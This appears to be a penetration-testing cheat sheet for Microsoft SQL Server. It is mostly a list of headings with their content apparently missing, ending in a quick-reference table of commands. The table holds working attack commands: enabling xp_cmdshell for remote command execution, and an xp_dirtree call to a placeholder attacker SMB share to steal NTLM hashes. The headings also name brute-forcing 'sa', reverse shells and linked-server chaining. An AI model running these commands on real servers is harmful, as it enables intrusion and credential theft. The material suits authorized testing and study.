Service Detection
Connect
impacket-mssqlclient
sqsh
Brute-Force
sa / (blank or weak password).
Command Execution — xp_cmdshell
Enable xp_cmdshell
Execute Commands
Reverse Shell
File Read
OPENROWSET
Steal NTLM Hash
Force MSSQL to authenticate to attacker SMB:Linked Servers
Enumerate Links
Execute on Linked Server
Chain Through Links
Enumerate
Databases
Tables
Users
Password Hashes
Impersonation
Quick Reference
| Check | Command |
|---|---|
| Connect | impacket-mssqlclient user:pass@TARGET |
| Enable xp_cmdshell | sp_configure 'xp_cmdshell', 1 |
| RCE | EXEC xp_cmdshell 'whoami' |
| Steal hash | EXEC xp_dirtree '\\ATTACKER\share' |
| Linked servers | EXEC sp_linkedservers |